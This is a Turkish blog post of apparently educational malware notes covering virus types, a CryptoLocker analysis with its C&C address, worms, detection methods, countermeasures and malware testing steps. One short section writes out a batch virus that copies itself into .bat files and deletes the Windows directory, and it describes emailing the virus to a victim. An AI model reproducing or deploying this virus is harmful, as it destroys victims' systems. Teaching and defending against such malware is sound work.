Asıl algoritma tutulurken mutasyona uğrayan bir koddur. Polymorphic kodu etkinleştirmek için virüs polimorfik motora (engine) (mutasyona uğratan motor ya da mutasyon motoru da denir) sahip olmalıdır. Bu yüzden iyi yazılmış bir polimorfik virüsün her bulaştığında aynı kalan hiçbir parçası yoktur.

 

Başkalaşmış (Metamorphic) Virüsler

Her yeni çalıştırılabilir bir şeye bulaştığında kendini yeniden yazar. Kodu ise kendini geçici bir görünüme çevirerek yeniden programlayabilir sonra da tekrar eski hâline döner.

 

Dosya Üstüne Yazılan (Overwriting File) veya Boşluk (Cavity) Virüsü

İşlevselliğini koruyup bir dosyanın uzunluğunu artırmadan host dosyasının bir kısmının üstüne bir sabit (genelde null ile) yazar.

 

Seyrek Yerleşik Virüs (Sparse Infector Virus)

Nadiren bulaşırlar veya sadece uzunlukları dar bir aralığa düşen dosyalara bulaşırlar. Belirlenmesi zordur.

 

Eş (Companion) Virüs/Gizlenen (Camouflage) Virüs

Virüs bulaştığı çalıştırılabilir her bir dosya için eş (companion) bir dosya oluşturur. Bu yüzden virüs kendini notepad.com olarak kaydedebilir ve kullanıcının notepad.exe (asıl program) çalıştırdığı her zaman bilgisayar notepad.com (virüs) yükleyip sisteme bulaştıracaktır. Immunet bunun için kullanılır.

 

Kabuk (Shell) Virüsleri

Kendini alt program olarak host kodu ve asıl program yaparak hedef host programın kodu etrafında bir shell oluşturur. Neredeyse tüm ön yükleme programı (boot program) virüsleri shell virüsleridir.

 

Dosya Uzantı Virüsleri

Dosyaların uzantılarını değiştirir. “.TXT” bir metin dosyası olarak görülürken güvenlidir. Uzantı kapatmışken birisi sana “BAD.TXT.VBS” isimli bir dosya gönderirse onu “BAD.TXT” olarak görürsün. Uzantıların kapalı olduğunu unuttuysan bunu bir metin dosyası olarak düşünüp açabilirsin. Bu bir çalıştırılabilir Visual Basic Script’i virüsüdür ve ciddi şekilde zarar verebilir. Windows’ta karşı önlem dosya uzantılarını gizlemeyi kapatmaktır.

 

Eklenti (Add-on) Virüsleri

Kodlarını host koduna herhangi bir değişiklik yapmadan sonuna ekler veya başında kendi kodunu eklemek için host kodunun yerini değiştirir.

 

Zorla Giren (Intrusive) Virüsler

Virüslü kodu kısmen veya tamamen host kodunun üzerine yazarlar.

 

Doğrudan Eylem veya Geçici (Direct Action or Transient) Virüsler

Temel bulaştırma tekniklerindendir. Belleğe yerleşmek için sunucu kodunun tüm kontrollerini iletir. Virüs sunucu kodu çalıştırıldığında çalışır ve kendini sonlandırır veya sunucu kodu çalışması sonlanır sonlanmaz bellekten çıkar.

 

Sonlanıp Yerleşen (Terminate and Stay Resident) Virüsler (TSR)

Temel bulaştırma tekniklerindendir. Bütün çalışma oturumu sırasında hedef hostun programı çalıştırılıp sonlandıktan sonra bile belleğe kalıcı olarak yerleşir. Sadece sistem yeniden ön yüklenerek (reboot) kaldırılabilir.

 

Basit Bir Virüs Programı Yazmak:

Yığın dosyası (batch file) Game.bat oluşturulur. (@ echo off  (alta) for %%f in (*.bat) do (alta) copy %%f + Game.bat (alta) del c:\Windows\*.*). à Game.bat yığın dosyası bat2com programı ile Game.com’a dönüştürülür. à Dosya kurbana e-posta ekiyle yollanır. à Çalıştırıldığında kendini dizindeki tüm “.bat” dosyalarına kopyalar ve Windows dizinindeki tüm dosyaları siler.

Sam’s Virus Generator, JPS Virus Maker, Andreinick05’s Batch Virus Maker, DeadLine’s Virus Maker, Sonic Bat – Batch File Virus Creator, Poison Virus Maker programları kullanılır.

 

678678 Virüs Analizi

Dosya Şifreleyen Virüs (Ransom Cryptolocker): Kullanıcı sistemini kilitleyip istemi kullanılmaz hâle getiren bir virüstür. Kullanıcı sistemindeki dosya tiplerini de şifreler.

 

Bulaştırma ve Yayma

Sistem zafiyetlerinden faydalanan (exploiting) sayfalara yönlendiren istenmeyen e-postalardaki kötücül bağlantılar ile olur. Bu exploit sayfaları etkilenmiş makineye Dosya Şifreleyen Virüs (Ransom Cryptolocker) ve diğer kötücül dosyaları indirir.

 

Özellikleri ve Belirtileri

Asıl dosyaların içerikleri rastgele anahtar üreten AES algoritması kullanılarak şifrelenir. Sisteme bulaşır bulaşmaz ilk Zararlı Yazılım (Malware) binary 184.164.136.134 ip adresli sabit kodlu (hard-coded) komuta kontrol sunucusuna bağlanmaya çalışır. Bu girişim başarısız olursa rastgele domain adı algoritması kullanarak bir domain adı üretip buna “.org, .net, .co.uk, .info, .com, .biz, .ru” gibi domain isimleri ekler.

 

Şifreleme Tekniği

Zararlı Yazılım (Malware) dosyaları şifrelemek için AES algoritması kullanır. Önce 256 bit AES anahtarı yaratır ve bunu dosyaları şifrelemek için kullanır. Dosyaların şifresini çözebilmek için Zararlı Yazılım (Malware) yaratıcısının o anahtarı bilmesi gerekir. Clear text olarak anahtar iletmekten kaçınmak için Zararlı Yazılım (Malware) asimetrik (asymmetric) anahtar algoritması yani RSA public (genel)/private (özel) anahtar çifti kullanarak şifreler. Şifrelenmiş anahtar daha sonra C&C sunucuya iletilir. Bunlardan sonra sistem ile anlaşılır anlaşılmaz Zararlı Yazılım (Malware) kullanıcıya uyarı gönderip dosyaların şifresini çözmek için fidye talep eder. Kayıt defterindeki “HKEY_CURRENT_USER\Software\CryptoLocker\Files” girdisi altında bu Zararlı Yazılım (Malware) tarafından şifrelenmiş dosyaların listesi tutulur. Bu Zararlı Yazılım (Malware) binary kendini %AppData%’ya kopyalar ve bir batch dosyası kullanarak kendini siler (%AppData%\{2E376276-3A5A-0712-2BE2-FBF2CFF7ECD5}.exe).

 

Virüs Belirleme Yöntemleri:

Tarama; Virüs saptanır saptanmaz virüs string özelliklerinin imzasını arayan tarama programları yazmak mümkündür.

 

Bütünlük Kontrolü; Bu işi yapan ürünler, tüm diski okuyup sistem bölümleri (sectors) ve dosyaların imzası işlevini gören bütünlük verisini kaydederler.

 

Ele Geçirme (Interception): Interceptor diske yazılan işletim sistemi taleplerini izler.

 

Kod Taklidi (Code Emulation): Antivirüs CPU ve bellek eylemlerini taklit etmek için sanal bir makine içinde kötücül kod çalıştırır. Bu teknikler sanal makine gerçek makineyi taklit ediyorsa şifrelenmiş virüs ve çok biçimli virüsleri ele almada çok etkilidir.

 

Sezgisel (Heuristic) Analiz; Sabit (static) veya hareketli (dynamic) olabilir. Sabit analizde antivirüs kodun virüslü olup olmadığını saptamak için dosya formatını ve kod yapısını inceler. Hareketli analizde antivirüs kodun virüslü olup olmadığını saptamak için şüpheli kodun code emulation’ını yapar.

 

1.1.3. Fidye yazılımı (ransomware)

Bilgisayar sistemindeki dosyalara ve klasörlere erişimi kısıtlayıp bunları kaldırmak için çevrimiçi fidye ödemesi talep eden bir Zararlı Yazılım (Malware) çeşididir.

 

Fidye Yazılımı (Ransomware) Ailesi;

  • Cryptorbit Fidye Yazılımı (Ransomware),
  • CryptoLocker Fidye Yazılımı (Ransomware),
  • CryptoDefense Fidye Yazılımı (Ransomware),
  • CryptoWall Fidye Yazılımı (Ransomware),
  • Police-themed Fidye Yazılımı (Ransomware).

 

1.1.4. Bilgisayar solucanları (computer worms)

İnsan etkileşimi olmadan bağımsız olarak ağ bağlantıları boyunca çoğalıp, çalışıp, bulaşabilen kötücül programlardır. Çoğu Solucan (worm) mevcut bilişim kaynaklarını yok ederek ağ boyunca çoğalıp bulaşması için oluşturulur ancak bazı Solucanlar (worm) sunucu sistemine zarar vermek için payload taşırlar. Saldırganlar Solucan (worm) yükünü (payload) bulaştırılan bilgisayarlarda ara kapılar kurmak için kullanırlar. Sonra da onları zombilere dönüştürüp botnet oluştururlar, botnetler siber saldırılar için kullanılabilir.

 

Solucan’ın (worm) Virüsten Farkı: Özel bir Zararlı Yazılım (Malware) olan Solucan (worm) kendini çoğaltıp belleği kullanabilirken başka programlara yapışamaz. Solucan (worm) bilgisayar sistemlerindeki dosya veya iletim bilgisi (information transport) özelliklerinden yararlanıp ağa otomatik olarak bulaşır ama bir virüs bunu yapamaz.

 

Hayalet Göz (Ghost Eye) Solucan (worm), şifreleri ele geçirmek için Facebook’ta veya Steam’de ya da sohbet sitelerinde rastgele mesajlar yayan bir sömürü programıdır. Internet Worm Maker Thing Solucan (worm) yapmak için kullanılır.

 

Solucan (worm) Analizi: Darlloz; Nesnelerin internetini (Internet of things) hedef almak için tasarlanmış bir Linux Solucan (worm)’üdür. Intel x86 mimarileri ile çalışan bilgisayarları hedef alır ve genellikle routerlarda,  video modemlerde (set-top boxes), güvenlik kameralarında bulunan ARM, MIPS, PowerPC mimarileriyle çalışan cihazlara odaklanır. Temel amacı gizli paraları bulmaktır. Rastgele ip adresleri üretir, IDleri ve şifreleri bilinen makine üzerinde özellikli bir yola erişir. Zafiyetten faydalanan (exploit) HTTP POST talepleri yollar. Hedef yamalanmamışsa kötücül sunucudan Solucan (worm) indirip sonraki hedefini araştırmaya başlar. Şu anda sadece Intel x86 sistemlerine bulaşıyor çünkü exploit kodunda indirilen URL intel mimarileri için ELF binary’de sabit kodlu (hard-coded).

 

Virüs ve Solucanlara (worm) Karşı Önlemler:

  1. Ortaya çıktıkları gibi bulaşmaları belirleyip ortadan kaldıran antivirüs yazılımı kurmak
  2. Güvenli bilişim için antivirüs politikası üretip personele dağıtmak
  3. İnternetten dosya veya programları indirirken talimatlara dikkat etmek
  4. Düzenli olarak antivirüs yazılımını güncellemek
  5. Virüsler e-posta ekleri aracılığıyla yayıldığından bilinmeyen göndericiden alınan ekleri açmamak
  6. Virüs bulaşırsa veriyi bozabilir bu yüzden düzenli olarak veri yedeği almak
  7. Antivirüs yazılımı kurduktan sonra tüm sürücüler için düzenli tarama ayarlamak
  8. Antivirüs programının güncel sürümünü kullanarak kontrol etmeden diskleri veya programları kabul etmemek
  9. Organizasyona gönderilen çalıştırılabilir kodun onaylandığından emin olmak
  10. Bulaşmış ön yüklenebilir sistem diskli makineyi ön yüklememek (boot)
  11. Güncel virüs tehditlerini bilmek
  12. Virüs bulaşmış mı diye DVDleri ve CDleri kontrol etmek
  13. Açılır pencere engelleyicinin (pop-up blocker) açık olduğundan emin olup internet güvenlik duvarı kullanmak
  14. Haftada bir kez disk temizlemeyi (disk clean up), kayıt defteri tarayıcıyı, disk birleştirmeyi (defragmentation) çalıştırmak
  15. İşletim sistemi Windows XP ise güvenlik duvarını açmak
  16. Haftada bir kez antispyware veya adware çalıştırmak
  17. Dosya uzantı tipi birden fazla olan dosyaları açmamak
  18. Anlık mesajlaşma aracılığıyla gönderiliyor olan dosyalara dikkat etmek

 

Arka Kapı’ya (Backdoor) Karşı Önlemler:

  1. Arka Kapı (Backdoor) programları zarara yol açmadan önce tarayıp belirleyebilen çoğu ticari antivirüs ürününden birini kullanmak
  2. Güvenilmeyen internet siteleri ve e-posta eklerinden indirilen uygulamaları kurmaması için kullanıcıları eğitmek
  3. Arka Kapı’ları (Backdoor) belirleyip yok etmek için McAfee, Norton gibi antivirüs araçlarını kullanmak

 

Parazit Öldüren (Sheep Dip) Bilgisayar: Zararlı Yazılım (Malware) içerebilecek şüpheli dosyaları, gelen mesajları vb. incelemeye sheep dipping (parazit öldürme) denir. Sheep dip bilgisayar, port, dosya, ağ gözlem sistemi (monitor) ve antivirüs yazılımı ile kurulup sadece harfiyen denetlenmiş ağa bağlanır.

 

Antivirüs Algılayıcı (Sensor) Sistem: Virüsler, solucanlar, Truvalar gibi kötücül kodları belirleyip inceleyen bilgisayar yazılımı derlemesidir. Sheep dip bilgisayarlarla beraber kullanılırlar.

 

1.1.5. Zararlı yazılım (malware) sızma testi

Açık portlar taranır (TCPView ve CurrPorts) à Çalışan süreçler/işlemler taranır (What’s Running) à Kayıt defteri girdileri taranır (jv16 Power Tools 2014 ve RegScanner) à Bilgisayara kurulmuş cihaz sürücüleri taranır (DriverView ve Driver Detective) à Windows servisleri taranır (SrvMan ve ServiWin) à Startup (Başlangıç) programları taranır (Security AutoRun ve Autoruns for Windows) à Dosyalar ve klasörler taranır (FCIV, TRIPWIRE, SIGVERIF, FastSum, WinMD5) à Ağ eylemleri taranır (Capsa Network Analyzer) à İşletim sistemi dosyalarındaki değişiklikler taranır (FCIV ve TRIPWIRE) à Trojanları belirlemek için Trojan Tarayıcı çalıştırılır (TrojanHunter ve Emsisoft Anti-Zararlı Yazılım (Malware)) à Tüm bulgular dokümante edilir à Trojan belirlenmişse makine ağdan ayrılır (isolate)/Trojan belirlenmemişse veya önceki işlemden sonra à Çalışan antivirüs güncel değilse güncellenir/Güncelse à Truva atlarını temizlemek için başka antivirüs çözümleri bulunur.

 

Virüs: Şüpheli sistem davranışı test edilir à Antivirüs yüklü değilse en güncel olan yüklenir ve sistem taranır/Yüklüyse à Antivirüs güncel değilse güncellenir ve sistem taranır/Güncelse à Gerçek zamanlı (real-time) tarama etkinleştirilmemişse etkinleştirilir ve sistem taranır/Etkinleştirilmişse à Çalışan prosesler taranır (What’s Running ve Autoruns for Windows à Kayıt defteri girdi değişimleri taranır (jv16 Power Tools 2014 ve RegScanner) à Windows servisleri kontrol edilir (SrvMan ve ServiWin) à Startup (Başlangıç) programları kontrol edilir (Security AutoRun ve Autoruns) à Dosyaların ve klasörlerin bütünlüğü kontrol edilir (FCIV, TRIPWIRE ve SIGVERIF) à İşletim sistemi dosyalarındaki değişiklikler kontrol edilir (FCIV ve TRIPWIRE) à Şüpheli eylem bulunmazsa sisteme virüs bulaşmamıştır/Bulunursa à Sistem ayrılır (isolate) à Güvenli modda antivirüs çalıştırılır à Virüs bulunursa bulaşmış dosyaların karantinaya alınması veya silinmesi için antivirüs ayarlanır/Bulunmazsa à Başka bir antivirüs kurulur à Sistem taranır à Virüs bulunursa bulaşmış dosyaların karantinaya alınması veya silinmesi için antivirüs ayarlanır/Bulunmazsa à Temiz bir işletim sistemi kopyasıyla sistem biçimlendirilir (format) à Tüm bulgular dokümante edilir.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir